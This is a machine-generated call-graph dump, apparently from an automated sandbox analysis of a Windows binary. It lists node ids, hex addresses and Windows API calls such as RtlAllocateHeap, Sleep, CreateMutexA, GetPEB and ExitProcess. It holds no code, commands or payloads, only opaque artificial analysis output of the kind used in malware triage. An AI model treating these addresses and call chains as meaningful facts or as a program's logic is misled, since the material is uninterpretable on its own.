11166 638a60 11102->11166 11104 639abd 11203 648150 11104->11203 11106 639acc 11107 647870 RtlAllocateHeap 11106->11107 11108 639bd9 11107->11108 11109 635b20 4 API calls 11108->11109 11110 639be1 11109->11110 11111 638a60 4 API calls 11110->11111 11112 639bf2 11111->11112 11113 648150 RtlAllocateHeap 11112->11113 11114 639c01 11113->11114 11211 635850 11115->11211 11117 635b64 11214 634af0 11117->11214 11119 635b8b 11120 635c27 11119->11120 11121 666b9a RtlAllocateHeap 11119->11121 11120->11102 11122 635c57 11121->11122 11122->11122 11123 647f30 RtlAllocateHeap 11122->11123 11125 635d4e 11123->11125 11124 635db6 11124->11102 11125->11124 11126 666b9a RtlAllocateHeap 11125->11126 11127 635de2 11126->11127 11128 635f0e 11127->11128 11129 666b9a RtlAllocateHeap 11127->11129 11128->11102 11130 635f2b 11129->11130 11131 647f30 RtlAllocateHeap 11130->11131 11132 635f99 11131->11132 11133 647f30 RtlAllocateHeap 11132->11133 11134 635fcd 11133->11134 11135 647f30 RtlAllocateHeap 11134->11135 11136 635ffe 11135->11136 11137 647f30 RtlAllocateHeap 11136->11137 11138 63602f 11137->11138 11139 647f30 RtlAllocateHeap 11138->11139 11141 636060 11139->11141 11140 636578 11140->11102 11141->11140 11142 666b9a RtlAllocateHeap 11141->11142 11143 6365a3 11142->11143 11144 647870 RtlAllocateHeap 11143->11144 11145 636676 11144->11145 11146 635b20 4 API calls 11145->11146 11147 63667c 11146->11147 11148 635b20 4 API calls 11147->11148 11149 636681 11148->11149 11221 632280 11149->11221 11151 636699 11152 647870 RtlAllocateHeap 11151->11152 11153 636702 11152->11153 11154 635b20 4 API calls 11153->11154 11155 63670d 11154->11155 11156 632280 4 API calls 11155->11156 11165 636727 11156->11165 11157 636822 11158 647f30 RtlAllocateHeap 11157->11158 11160 63686c 11158->11160 11159 647870 RtlAllocateHeap 11159->11165 11161 647f30 RtlAllocateHeap 11160->11161 11164 6368b3 11161->11164 11162 635b20 4 API calls 11162->11165 11163 632280 4 API calls 11163->11165 11164->11102 11165->11157 11165->11159 11165->11162 11165->11163 11167 638aac 11166->11167 11168 647870 RtlAllocateHeap 11167->11168 11169 638abc 11168->11169 11170 635b20 4 API calls 11169->11170 11171 638ac7 11170->11171 11172 647f30 RtlAllocateHeap 11171->11172 11173 638b13 11172->11173 11174 647f30 RtlAllocateHeap 11173->11174 11175 638b65 11174->11175 11176 648150 RtlAllocateHeap 11175->11176 11179 638b77 11176->11179 11177 638c31 11177->11104 11178 666b9a RtlAllocateHeap 11180 638c5d 11178->11180 11179->11177 11179->11178 11181 647870 RtlAllocateHeap 11180->11181 11182 638cbf 11181->11182 11183 635b20 4 API calls 11182->11183 11184 638cca 11183->11184 11185 647f30 RtlAllocateHeap 11184->11185 11186 638d1c 11185->11186 11187 648150 RtlAllocateHeap 11186->11187 11189 638d2e 11187->11189 11188 638dae 11188->11104 11189->11188 11190 666b9a RtlAllocateHeap 11189->11190 11191 638dda 11190->11191 11192 647870 RtlAllocateHeap 11191->11192 11193 638e3f 11192->11193 11194 635b20 4 API calls 11193->11194 11195 638e4a 11194->11195 11196 647f30 RtlAllocateHeap 11195->11196 11197 638e9c 11196->11197 11198 648150 RtlAllocateHeap 11197->11198 11200 638eae 11198->11200 11199 638f2e 11199->11104 11200->11199 11201 666b9a RtlAllocateHeap 11200->11201 11202 638f5a 11201->11202 11204 6481c2 11203->11204 11205 648178 11203->11205 11208 648e70 RtlAllocateHeap 11204->11208 11210 6481d1 11204->11210 11205->11204 11206 648181 11205->11206 11525 6491b0 11206->11525 11208->11210 11209 64818a 11209->11106 11210->11106 11224 647df0 11211->11224 11213 63587b 11213->11117 11215 634b24 11214->11215 11216 634b4e 11214->11216 11217 647f30 RtlAllocateHeap 11215->11217 11219 647df0 RtlAllocateHeap 11216->11219 11218 634b3b 11217->11218 11218->11119 11220 634bab 11219->11220 11220->11119 11239 632240 11221->11239 11227 647e37 11224->11227 11228 647e0e 11224->11228 11225 647f23 11226 6491a0 RtlAllocateHeap 11225->11226 11229 647f28 11226->11229 11227->11225 11230 647eae 11227->11230 11231 647e8b 11227->11231 11228->11213 11232 632440 RtlAllocateHeap 11229->11232 11235 64d312 RtlAllocateHeap 11230->11235 11236 647e9c 11230->11236 11231->11229 11234 64d312 RtlAllocateHeap 11231->11234 11233 647f2d 11232->11233 11234->11236 11235->11236 11237 666b9a RtlAllocateHeap 11236->11237 11238 647f05 11236->11238 11237->11225 11238->11213 11240 632256 11239->11240 11243 668667 11240->11243 11246 667456 11243->11246 11245 632264 11245->11151 11247 667496 11246->11247 11248 66747e 11246->11248 11247->11248 11249 66749e 11247->11249 11250 667443 RtlAllocateHeap 11248->11250 11251 66683a 4 API calls 11249->11251 11252 667483 11250->11252 11254 6674ae 11251->11254 11253 666b8a RtlAllocateHeap 11252->11253 11255 66748e 11253->11255 11259 667a11 11254->11259 11255->11245 11275 6684da 11259->11275 11261 667535 11272 667866 11261->11272 11262 667a31 11263 667443 RtlAllocateHeap 11262->11263 11264 667a36 11263->11264 11265 666b8a RtlAllocateHeap 11264->11265 11265->11261 11266 667a22 11266->11261 11266->11262 11282 667b62 11266->11282 11290 667fb5 11266->11290 11295 667c0f 11266->11295 11300 667c35 11266->11300 11329 667d83 11266->11329 11273 66acb5 RtlAllocateHeap 11272->11273 11274 667876 11273->11274 11274->11255 11276 6684f2 11275->11276 11277 6684df 11275->11277 11276->11266 11278 667443 RtlAllocateHeap 11277->11278 11279 6684e4 11278->11279 11280 666b8a RtlAllocateHeap 11279->11280 11281 6684ef 11280->11281 11281->11266 11351 667b81 11282->11351 11284 667b67 11285 667b7e 11284->11285 11286 667443 RtlAllocateHeap 11284->11286 11285->11266 11287 667b70 11286->11287 11288 666b8a RtlAllocateHeap 11287->11288 11289 667b7b 11288->11289 11289->11266 11291 667fbe 11290->11291 11293 667fc5 11290->11293 11360 66799d 11291->11360 11293->11266 11296 667c1f 11295->11296 11297 667c18 11295->11297 11296->11266 11298 66799d 4 API calls 11297->11298 11299 667c1e 11298->11299 11299->11266 11301 667c56 11300->11301 11302 667c3c 11300->11302 11303 667c86 11301->11303 11306 667443 RtlAllocateHeap 11301->11306 11302->11303 11304 667d9c 11302->11304 11305 667e08 11302->11305 11303->11266 11316 667ddf 11304->11316 11319 667da8 11304->11319 11308 667e4e 11305->11308 11309 667e0f 11305->11309 11305->11316 11307 667c72 11306->11307 11310 666b8a RtlAllocateHeap 11307->11310 11419 668451 11308->11419 11313 667e14 11309->11313 11314 667db6 11309->11314 11312 667c7d 11310->11312 11312->11266 11313->11316 11318 667e19 11313->11318 11326 667dc4 11314->11326 11328 667dd8 11314->11328 11413 66808e 11314->11413 11316->11326 11316->11328 11404 66826d 11316->11404 11317 667def 11317->11328 11390 6681dd 11317->11390 11321 667e1e 11318->11321 11322 667e2c 11318->11322 11319->11314 11319->11317 11319->11326 11321->11328 11394 668432 11321->11394 11398 6683be 11322->11398 11326->11328 11422 668537 11326->11422 11328->11266 11330 667d9c 11329->11330 11331 667e08 11329->11331 11339 667ddf 11330->11339 11341 667da8 11330->11341 11332 667e4e 11331->11332 11333 667e0f 11331->11333 11331->11339 11336 668451 RtlAllocateHeap 11332->11336 11334 667e14 11333->11334 11335 667db6 11333->11335 11338 667e19 11334->11338 11334->11339 11337 66808e 4 API calls 11335->11337 11349 667dc4 11335->11349 11350 667dd8 11335->11350 11336->11349 11337->11349 11343 667e1e 11338->11343 11344 667e2c 11338->11344 11342 66826d RtlAllocateHeap 11339->11342 11339->11349 11339->11350 11340 667def 11346 6681dd 4 API calls 11340->11346 11340->11350 11341->11335 11341->11340 11341->11349 11342->11349 11347 668432 RtlAllocateHeap 11343->11347 11343->11350 11345 6683be RtlAllocateHeap 11344->11345 11345->11349 11346->11349 11347->11349 11348 668537 4 API calls 11348->11350 11349->11348 11349->11350 11350->11266 11354 667bab 11351->11354 11353 667b8d 11353->11284 11356 667bcd 11354->11356 11355 667c04 11355->11353 11356->11355 11357 667443 RtlAllocateHeap 11356->11357 11358 667bf9 11357->11358 11359 666b8a RtlAllocateHeap 11358->11359 11359->11355 11361 6679af 11360->11361 11362 6679b4 11360->11362 11363 667443 RtlAllocateHeap 11361->11363 11368 668979 11362->11368 11363->11362 11366 667443 RtlAllocateHeap 11367 6679e6 11366->11367 11367->11266 11369 668994 11368->11369 11372 6686d7 11369->11372 11373 6684da RtlAllocateHeap 11372->11373 11374 6686e9 11373->11374 11375 668722 11374->11375 11376 6686fe 11374->11376 11389 6679d2 11374->11389 11377 66683a GetPEB ExitProcess GetPEB RtlAllocateHeap 11375->11377 11378 667443 RtlAllocateHeap 11376->11378 11382 66872e 11377->11382 11379 668703 11378->11379 11381 666b8a RtlAllocateHeap 11379->11381 11380 668925 GetPEB ExitProcess GetPEB RtlAllocateHeap 11380->11382 11381->11389 11382->11380 11383 66875d 11382->11383 11385 6688fc RtlAllocateHeap 11383->11385 11386 6687c7 11383->11386 11384 6688fc RtlAllocateHeap 11387 66888f 11384->11387 11385->11386 11386->11384 11388 667443 RtlAllocateHeap 11387->11388 11387->11389 11388->11389 11389->11366 11389->11367 11392 6681f8 11390->11392 11391 66822a 11391->11326 11392->11391 11426 66c65f 11392->11426 11395 66843e 11394->11395 11396 66826d RtlAllocateHeap 11395->11396 11397 668450 11396->11397 11397->11326 11400 6683d3 11398->11400 11399 667443 RtlAllocateHeap 11401 6683dc 11399->11401 11400->11399 11403 6683e7 11400->11403 11402 666b8a RtlAllocateHeap 11401->11402 11402->11403 11403->11326 11405 668280 11404->11405 11406 6682b2 11405->11406 11407 66829b 11405->11407 11412 6682ab 11406->11412 11450 6675ec 11406->11450 11408 667443 RtlAllocateHeap 11407->11408 11409 6682a0 11408->11409 11410 666b8a RtlAllocateHeap 11409->11410 11410->11412 11412->11326 11414 6680a7 11413->11414 11415 6675ec RtlAllocateHeap 11414->11415 11416 6680e4 11415->11416 11463 66d199 11416->11463 11418 66815a 11418->11326 11418->11418 11420 66826d RtlAllocateHeap 11419->11420 11421 668468 11420->11421 11421->11326 11423 6685aa 11422->11423 11425 668554 11422->11425 11423->11328 11424 66c65f 4 API calls 11424->11425 11425->11423 11425->11424 11429 66c504 11426->11429 11430 66c514 11429->11430 11431 66c552 11430->11431 11432 66c53e 11430->11432 11441 66c519 11430->11441 11434 66683a GetPEB ExitProcess GetPEB RtlAllocateHeap 11431->11434 11433 667443 RtlAllocateHeap 11432->11433 11435 66c543 11433->11435 11436 66c55d 11434->11436 11437 666b8a RtlAllocateHeap 11435->11437 11438 66c56d 11436->11438 11442 66c599 11436->11442 11437->11441 11439 672a3d RtlAllocateHeap 11438->11439 11440 66c582 11439->11440 11440->11441 11444 667443 RtlAllocateHeap 11440->11444 11441->11391 11446 66c5af 11442->11446 11449 66c5e6 11442->11449 11443 667443 RtlAllocateHeap 11443->11441 11444->11441 11445 667443 RtlAllocateHeap 11447 66c650 11445->11447 11446->11441 11446->11443 11448 666b8a RtlAllocateHeap 11447->11448 11448->11441 11449->11441 11449->11445 11451 667610 11450->11451 11452 667601 11450->11452 11454 667606 11451->11454 11455 66af0b RtlAllocateHeap 11451->11455 11453 667443 RtlAllocateHeap 11452->11453 11453->11454 11454->11412 11456 667637 11455->11456 11457 66764e 11456->11457 11460 667880 11456->11460 11459 66acb5 RtlAllocateHeap 11457->11459 11459->11454 11461 66acb5 RtlAllocateHeap 11460->11461 11462 66788f 11461->11462 11462->11457 11464 66d1bf 11463->11464 11465 66d1a9 11463->11465 11464->11465 11469 66d1d1 11464->11469 11466 667443 RtlAllocateHeap 11465->11466 11467 66d1ae 11466->11467 11468 666b8a RtlAllocateHeap 11467->11468 11481 66d1b8 11468->11481 11471 66d238 11469->11471 11472 66d20a 11469->11472 11470 66d256 11475 66d2b5 11470->11475 11476 66d27f 11470->11476 11471->11470 11473 66d25b 11471->11473 11484 66d0d0 11472->11484 11489 66c9b0 11473->11489 11517 66ccc9 11475->11517 11478 66d284 11476->11478 11479 66d29d 11476->11479 11500 66d00f 11478->11500 11510 66ceb3 11479->11510 11481->11418 11485 66d0e6 11484->11485 11486 66d0f1 11484->11486 11485->11481 11487 66a0b1 RtlAllocateHeap 11486->11487 11488 66d14c 11487->11488 11488->11481 11490 66c9c2 11489->11490 11491 66683a GetPEB ExitProcess GetPEB RtlAllocateHeap 11490->11491 11492 66c9d6 11491->11492 11493 66c9f2 11492->11493 11494 66c9de 11492->11494 11497 66ccc9 GetPEB ExitProcess GetPEB RtlAllocateHeap 11493->11497 11499 66c9ed 11493->11499 11495 667443 RtlAllocateHeap 11494->11495 11496 66c9e3 11495->11496 11498 666b8a RtlAllocateHeap 11496->11498 11497->11499 11498->11499 11499->11481 11501 673068 RtlAllocateHeap 11500->11501 11502 66d03d 11501->11502 11503 672b07 RtlAllocateHeap 11502->11503 11504 66d06f 11503->11504 11505 66d076 11504->11505 11506 66d0af 11504->11506 11507 66d088 11504->11507 11505->11481 11508 66cd6b GetPEB ExitProcess GetPEB RtlAllocateHeap 11506->11508 11509 66cf3e GetPEB ExitProcess GetPEB RtlAllocateHeap 11507->11509 11508->11505 11509->11505 11511 673068 RtlAllocateHeap 11510->11511 11512 66cee0 11511->11512 11513 672b07 RtlAllocateHeap 11512->11513 11514 66cf18 11513->11514 11515 66cf1f 11514->11515 11516 66cf3e GetPEB ExitProcess GetPEB RtlAllocateHeap 11514->11516 11515->11481 11516->11515 11518 66cce1 11517->11518 11519 673068 RtlAllocateHeap 11518->11519 11520 66ccfa 11519->11520 11521 672b07 RtlAllocateHeap 11520->11521 11522 66cd3f 11521->11522 11523 66cd6b GetPEB ExitProcess GetPEB RtlAllocateHeap 11522->11523 11524 66cd46 11522->11524 11523->11524 11524->11481 11526 6491c4 11525->11526 11529 6491d5 11526->11529 11530 649410 11526->11530 11528 64925b 11528->11209 11529->11209 11531 649549 11530->11531 11532 64943b 11530->11532 11533 6491a0 RtlAllocateHeap 11531->11533 11536 649482 11532->11536 11537 6494a9 11532->11537 11534 64954e 11533->11534 11535 632440 RtlAllocateHeap 11534->11535 11542 649493 11535->11542 11536->11534 11538 64948d 11536->11538 11541 64d312 RtlAllocateHeap 11537->11541 11537->11542 11540 64d312 RtlAllocateHeap 11538->11540 11539 666b9a RtlAllocateHeap 11543 649558 11539->11543 11540->11542 11541->11542 11542->11539 11544 649511 11542->11544 11543->11528 11544->11528 11551 6666e7 11552 6666f3 11551->11552 11553 6666fd 11552->11553 11555 666712 11552->11555 11554 667443 RtlAllocateHeap 11553->11554 11556 666702 11554->11556 11557 66670d 11555->11557 11560 666670 11555->11560 11558 666b8a RtlAllocateHeap 11556->11558 11558->11557 11561 666692 11560->11561 11562 66667d 11560->11562 11569 66668d 11561->11569 11576 669ef9 11561->11576 11563 667443 RtlAllocateHeap 11562->11563 11564 666682 11563->11564 11566 666b8a RtlAllocateHeap 11564->11566 11566->11569 11569->11557 11572 6666b5 11593 66ad7b 11572->11593 11575 66acb5 RtlAllocateHeap 11575->11569 11577 669f11 11576->11577 11581 6666a7 11576->11581 11578 66aea4 RtlAllocateHeap 11577->11578 11577->11581 11579 669f2f 11578->11579 11608 6702f8 11579->11608 11582 66aecb 11581->11582 11583 6666af 11582->11583 11584 66aee2 11582->11584 11586 66aea4 11583->11586 11584->11583 11585 66acb5 RtlAllocateHeap 11584->11585 11585->11583 11587 66aec5 11586->11587 11588 66aeb0 11586->11588 11587->11572 11589 667443 RtlAllocateHeap 11588->11589 11590 66aeb5 11589->11590 11591 666b8a RtlAllocateHeap 11590->11591 11592 66aec0 11591->11592 11592->11572 11594 66ada1 11593->11594 11595 66ad8c 11593->11595 11597 66adea 11594->11597 11601 66adc8 11594->11601 11596 667430 RtlAllocateHeap 11595->11596 11598 66ad91 11596->11598 11599 667430 RtlAllocateHeap 11597->11599 11600 667443 RtlAllocateHeap 11598->11600 11602 66adef 11599->11602 11606 6666bb 11600->11606 11626 66acef 11601->11626 11604 667443 RtlAllocateHeap 11602->11604 11605 66adf7 11604->11605 11607 666b8a RtlAllocateHeap 11605->11607 11606->11569 11606->11575 11607->11606 11609 670304 11608->11609 11610 670324 11609->11610 11611 67030c 11609->11611 11613 6703bf 11610->11613 11621 670356 11610->11621 11612 667430 RtlAllocateHeap 11611->11612 11614 670311 11612->11614 11615 667430 RtlAllocateHeap 11613->11615 11616 667443 RtlAllocateHeap 11614->11616 11617 6703c4 11615->11617 11624 670319 11616->11624 11618 667443 RtlAllocateHeap 11617->11618 11619 6703cc 11618->11619 11620 666b8a RtlAllocateHeap 11619->11620 11620->11624 11622 667443 RtlAllocateHeap 11621->11622 11621->11624 11623 67037d 11622->11623 11625 667430 RtlAllocateHeap 11623->11625 11624->11581 11625->11624 11627 66acfb 11626->11627 11628 66ad30 11627->11628 11629 66ad3b 11627->11629 11633 66ae08 11628->11633 11630 667443 RtlAllocateHeap 11629->11630 11632 66ad36 11630->11632 11632->11606 11644 66beaf 11633->11644 11635 66ae1e 11640 66ae98 11635->11640 11642 66740d RtlAllocateHeap 11635->11642 11636 66ae18 11636->11635 11638 66beaf RtlAllocateHeap 11636->11638 11643 66ae50 11636->11643 11637 66beaf RtlAllocateHeap 11637->11635 11639 66ae47 11638->11639 11641 66beaf RtlAllocateHeap 11639->11641 11640->11632 11641->11643 11642->11640 11643->11635 11643->11637 11645 66bed1 11644->11645 11646 66bebc 11644->11646 11648 667430 RtlAllocateHeap 11645->11648 11650 66bef6 11645->11650 11647 667430 RtlAllocateHeap 11646->11647 11649 66bec1 11647->11649 11651 66bf01 11648->11651 11652 667443 RtlAllocateHeap 11649->11652 11650->11636 11653 667443 RtlAllocateHeap 11651->11653 11655 66bec9 11652->11655 11654 66bf09 11653->11654 11656 666b8a RtlAllocateHeap 11654->11656 11655->11636 11656->11655 11657 63b6e1 11658 63b6ee 11657->11658 11659 647870 RtlAllocateHeap 11658->11659 11660 63b723 11659->11660 11661 647870 RtlAllocateHeap 11660->11661 11662 63b73b 11661->11662 11663 647870 RtlAllocateHeap 11662->11663 11664 63b753 11663->11664 11665 647870 RtlAllocateHeap 11664->11665 11666 63b765 11665->11666 11706 6340e0 11707 63412a 11706->11707 11709 634172 11707->11709 11710 633ea0 11707->11710 11711 633f08 11710->11711 11715 633ede 11710->11715 11712 633f18 11711->11712 11716 632bc0 11711->11716 11712->11709 11715->11709 11717 64d312 RtlAllocateHeap 11716->11717 11718 632bce 11717->11718 11726 64b777 11718->11726 11720 632c02 11721 632c09 11720->11721 11732 632c40 11720->11732 11721->11709 11723 632c18 11735 632520 11723->11735 11725 632c25 11727 64b784 11726->11727 11731 64b7a3 11726->11731 11738 64caa7 11727->11738 11729 64b794 11729->11731 11740 64b74e 11729->11740 11731->11720 11746 64b72b 11732->11746 11734 632c72 11734->11723 11736 6637dc RtlAllocateHeap 11735->11736 11737 632557 11736->11737 11737->11725 11739 64cac2 CreateThreadpoolWork 11738->11739 11739->11729 11742 64b757 11740->11742 11744 64ccfc 11742->11744 11743 64b771 11743->11731 11745 64cd11 TpPostWork 11744->11745 11745->11743 11747 64b737 11746->11747 11748 64b747 11746->11748 11747->11748 11750 64c9a8 11747->11750 11748->11734 11751 64c9bd TpReleaseWork 11750->11751 11751->11748 11764 6482f0 11772 6475d0 11764->11772 11766 648369 11767 648e70 RtlAllocateHeap 11766->11767 11768 648384 11766->11768 11767->11768 11769 648e70 RtlAllocateHeap 11768->11769 11771 6483d8 11768->11771 11770 64841e 11769->11770 11773 6475eb 11772->11773 11785 6476d4 11772->11785 11774 647761 11773->11774 11777 64766b 11773->11777 11778 647681 11773->11778 11779 64765a 11773->11779 11773->11785 11775 6491a0 RtlAllocateHeap 11774->11775 11776 647766 11775->11776 11780 632440 RtlAllocateHeap 11776->11780 11784 666b9a RtlAllocateHeap 11777->11784 11777->11785 11778->11777 11783 64d312 RtlAllocateHeap 11778->11783 11779->11776 11782 64d312 RtlAllocateHeap 11779->11782 11781 64776b 11780->11781 11782->11777 11783->11777 11784->11774 11785->11766 11791 6364fc 11793 636510 11791->11793 11792 666b9a RtlAllocateHeap 11795 6365a3 11792->11795 11793->11792 11794 636578 11793->11794 11796 647870 RtlAllocateHeap 11795->11796 11797 636676 11796->11797 11798 635b20 4 API calls 11797->11798 11799 63667c 11798->11799 11800 635b20 4 API calls 11799->11800 11801 636681 11800->11801 11802 632280 4 API calls 11801->11802 11803 636699 11802->11803 11804 647870 RtlAllocateHeap 11803->11804 11805 636702 11804->11805 11806 635b20 4 API calls 11805->11806 11807 63670d 11806->11807 11808 632280 4 API calls 11807->11808 11817 636727 11808->11817 11809 636822 11810 647f30 RtlAllocateHeap 11809->11810 11812 63686c 11810->11812 11811 647870 RtlAllocateHeap 11811->11817 11813 647f30 RtlAllocateHeap 11812->11813 11816 6368b3 11813->11816 11814 635b20 4 API calls 11814->11817 11815 632280 4 API calls 11815->11817 11817->11809 11817->11811 11817->11814 11817->11815 11869 632ad0 11870 632ada 11869->11870 11871 632adc 11869->11871 11872 64c19a 5 API calls 11871->11872 11873 632ae2 11872->11873 11874 639ad5 11875 639ad7 11874->11875 11876 647870 RtlAllocateHeap 11875->11876 11877 639bd9 11876->11877 11878 635b20 4 API calls 11877->11878 11879 639be1 11878->11879 11880 638a60 4 API calls 11879->11880 11881 639bf2 11880->11881 11882 648150 RtlAllocateHeap 11881->11882 11883 639c01 11882->11883 11884 63a0de 11886 63a0e6 11884->11886 11885 63a865 11888 666b9a RtlAllocateHeap 11885->11888 11886->11885 11887 63a1b9 11886->11887 11890 647f30 RtlAllocateHeap 11887->11890 11889 63a883 Sleep CreateMutexA 11888->11889 11892 63a8be 11889->11892 11891 63a833 11890->11891 11893 6320dc 11894 6320e6 11893->11894 11895 64d57e RtlAllocateHeap 11894->11895 11896 6320f2 11895->11896 11945 6388b0 11946 638a1a 11945->11946 11953 638908 11945->11953 11947 647870 RtlAllocateHeap 11947->11953 11948 635b20 4 API calls 11948->11953 11949 638a50 11956 648070 11949->11956 11950 647f30 RtlAllocateHeap 11950->11953 11952 638a55 11954 666b9a RtlAllocateHeap 11952->11954 11953->11946 11953->11947 11953->11948 11953->11949 11953->11950 11953->11952 11955 638a5a 11954->11955 11959 64c109 11956->11959 11958 64807a 11962 64c08d 11959->11962 11961 64c11a 11961->11958 11963 6322a0 RtlAllocateHeap 11962->11963 11964 64c09f 11963->11964 11964->11961 11965 636ab9 11969 636ad1 11965->11969 11966 647f30 RtlAllocateHeap 11967 636b7c 11966->11967 11968 6491b0 RtlAllocateHeap 11967->11968 11970 636b8d 11968->11970 11969->11966 11969->11970 11971 647f30 RtlAllocateHeap 11970->11971 11972 636cb3 11971->11972 11978 632080 11979 64c5bb 2 API calls 11978->11979 11980 63208c 11979->11980 11981 64d57e RtlAllocateHeap 11980->11981 11982 632096 11981->11982 12008 632e80 12009 632ec6 12008->12009 12013 632f2f 12008->12013 12010 64c5dc GetSystemTimePreciseAsFileTime 12009->12010 12011 632ed2 12010->12011 12014 632fde 12011->12014 12015 632edd 12011->12015 12012 632faf 12013->12012 12021 64c5dc GetSystemTimePreciseAsFileTime 12013->12021 12016 64c19a 5 API calls 12014->12016 12018 64d312 RtlAllocateHeap 12015->12018 12020 632ef0 12015->12020 12017 632fe4 12016->12017 12019 64c19a 5 API calls 12017->12019 12018->12020 12022 632f79 12019->12022 12020->12013 12020->12017 12021->12022 12023 64c19a 5 API calls 12022->12023 12024 632f80 12022->12024 12023->12024 12025 64c19a 5 API calls 12024->12025 12026 632f98 12024->12026 12025->12026 12026->12012 12027 64c19a 5 API calls 12026->12027 12028 632ffc 12027->12028 12029 64c5dc GetSystemTimePreciseAsFileTime 12028->12029 12039 633040 12029->12039 12030 633185 12031 64c19a 5 API calls 12030->12031 12032 63318b 12031->12032 12033 64c19a 5 API calls 12032->12033 12034 633191 12033->12034 12035 64c19a 5 API calls 12034->12035 12041 633153 12035->12041 12036 633167 12037 64c19a 5 API calls 12038 63319d 12037->12038 12039->12030 12039->12032 12039->12036 12040 64c5dc GetSystemTimePreciseAsFileTime 12039->12040 12042 63311f 12040->12042 12041->12036 12041->12037 12042->12030 12042->12034 12042->12041 12043 64bc7c GetSystemTimePreciseAsFileTime 12042->12043 12043->12042 12054 635e86 12056 635e91 12054->12056 12055 635f0e 12056->12055 12057 666b9a RtlAllocateHeap 12056->12057 12058 635f2b 12057->12058 12059 647f30 RtlAllocateHeap 12058->12059 12060 635f99 12059->12060 12061 647f30 RtlAllocateHeap 12060->12061 12062 635fcd 12061->12062 12063 647f30 RtlAllocateHeap 12062->12063 12064 635ffe 12063->12064 12065 647f30 RtlAllocateHeap 12064->12065 12066 63602f 12065->12066 12067 647f30 RtlAllocateHeap 12066->12067 12069 636060 12067->12069 12068 636578 12069->12068 12070 666b9a RtlAllocateHeap 12069->12070 12071 6365a3 12070->12071 12072 647870 RtlAllocateHeap 12071->12072 12073 636676 12072->12073 12074 635b20 4 API calls 12073->12074 12075 63667c 12074->12075 12076 635b20 4 API calls 12075->12076 12077 636681 12076->12077 12078 632280 4 API calls 12077->12078 12079 636699 12078->12079 12080 647870 RtlAllocateHeap 12079->12080 12081 636702 12080->12081 12082 635b20 4 API calls 12081->12082 12083 63670d 12082->12083 12084 632280 4 API calls 12083->12084 12093 636727 12084->12093 12085 636822 12086 647f30 RtlAllocateHeap 12085->12086 12088 63686c 12086->12088 12087 647870 RtlAllocateHeap 12087->12093 12089 647f30 RtlAllocateHeap 12088->12089 12092 6368b3 12089->12092 12090 635b20 4 API calls 12090->12093 12091 632280 4 API calls 12091->12093 12093->12085 12093->12087 12093->12090 12093->12091 12094 668a81 12095 6686d7 4 API calls 12094->12095 12096 668a9f 12095->12096 10129 66a688 10130 66a692 10129->10130 10131 66d6ef RtlAllocateHeap 10130->10131 10132 66a6ab 10130->10132 10133 66a6d3 10131->10133 10134 66a713 10133->10134 10135 66a6db 10133->10135 10137 66a35f RtlAllocateHeap 10134->10137 10136 66acb5 RtlAllocateHeap 10135->10136 10136->10132 10138 66a71e 10137->10138 10139 66acb5 RtlAllocateHeap 10138->10139 10139->10132 12097 648090 12098 6475d0 RtlAllocateHeap 12097->12098 12099 6480e0 12098->12099 12100 648132 12099->12100 12102 648bd0 12099->12102 12103 648bf3 12102->12103 12104 648cf9 12102->12104 12108 648c35 12103->12108 12109 648c5f 12103->12109 12105 6491a0 RtlAllocateHeap 12104->12105 12106 648cfe 12105->12106 12107 632440 RtlAllocateHeap 12106->12107 12115 648c46 12107->12115 12108->12106 12110 648c40 12108->12110 12111 64d312 RtlAllocateHeap 12109->12111 12109->12115 12113 64d312 RtlAllocateHeap 12110->12113 12111->12115 12112 666b9a RtlAllocateHeap 12114 648d08 12112->12114 12113->12115 12115->12112 12116 648cbb 12115->12116 12116->12099 12157 666974 12158 666982 12157->12158 12159 66698c 12157->12159 12170 66b515 12158->12170 12161 6668bd 4 API calls 12159->12161 12163 6669a6 12161->12163 12162 666989 12164 66681d RtlAllocateHeap 12163->12164 12165 6669b3 12164->12165 12166 6669ba 12165->12166 12167 66b515 RtlAllocateHeap 12165->12167 12168 6669d8 12166->12168 12169 66acb5 RtlAllocateHeap 12166->12169 12167->12166 12169->12168 12171 66b522 12170->12171 12172 66b539 12171->12172 12173 66740d RtlAllocateHeap 12171->12173 12172->12162 12174 66b533 12173->12174 12174->12162 12218 63a348 12219 63a350 12218->12219 12220 63a86f 12219->12220 12221 63a423 12219->12221 12222 666b9a RtlAllocateHeap 12220->12222 12225 647f30 RtlAllocateHeap 12221->12225 12223 63a874 12222->12223 12224 666b9a RtlAllocateHeap 12223->12224 12226 63a879 12224->12226 12227 63a833 12225->12227 12228 666b9a RtlAllocateHeap 12226->12228 12229 63a87e 12228->12229 12230 63a883 Sleep CreateMutexA 12229->12230 12231 666b9a RtlAllocateHeap 12229->12231 12232 63a8be 12230->12232 12231->12230 12236 632b50 12237 632b8e 12236->12237 12238 64b72b TpReleaseWork 12237->12238 12239 632b9b 12238->12239 12240 633f5f 12241 633f6d 12240->12241 12245 633f85 12240->12245 12242 6323d0 5 API calls 12241->12242 12243 633f76 12242->12243 12244 633ca0 RtlAllocateHeap 12243->12244 12244->12245 10140 666559 10143 6663f7 10140->10143 10144 666405 10143->10144 10145 666450 10144->10145 10148 66645b 10144->10148 10147 66645a 10154 66a1c2 GetPEB 10148->10154 10150 666465 10151 66646a GetPEB 10150->10151 10152 66647a 10150->10152 10151->10152 10153 666492 ExitProcess 10152->10153 10155 66a1dc 10154->10155 10155->10150 12289 632130 12294 64c62c 12289->12294 12292 64d57e RtlAllocateHeap 12293 632144 12292->12293 12295 63213a 12294->12295 12296 64c63c 12294->12296 12295->12292 12296->12295 12298 64ceee 12296->12298 12299 64cc05 InitializeCriticalSectionEx 12298->12299 12300 64cf00 12299->12300 12300->12296 12301 633930 12302 64c5bb 2 API calls 12301->12302 12303 633967 12302->12303 12304 64c5bb 2 API calls 12303->12304 12305 6339a6 12304->12305 12306 633730 12307 63375b 12306->12307 12308 63378d 12307->12308 12309 666b9a RtlAllocateHeap 12307->12309 12310 6337cf 12309->12310 12346 635500 12347 635520 12346->12347 12348 632280 4 API calls 12347->12348 12349 635620 12347->12349 12348->12347 12350 638700 12351 638803 12350->12351 12360 638749 12350->12360 12352 647f30 RtlAllocateHeap 12351->12352 12358 638853 12352->12358 12353 63889c 12356 648070 RtlAllocateHeap 12353->12356 12354 638879 12355 647f30 RtlAllocateHeap 12355->12360 12357 6388a1 12356->12357 12358->12354 12359 666b9a RtlAllocateHeap 12358->12359 12359->12353 12360->12351 12360->12353 12360->12355 12360->12358 12369 648510 12370 648526 12369->12370 12370->12370 12371 64853b 12370->12371 12372 648e70 RtlAllocateHeap 12370->12372 12372->12371 12373 648d10 12374 648e5f 12373->12374 12377 648d35 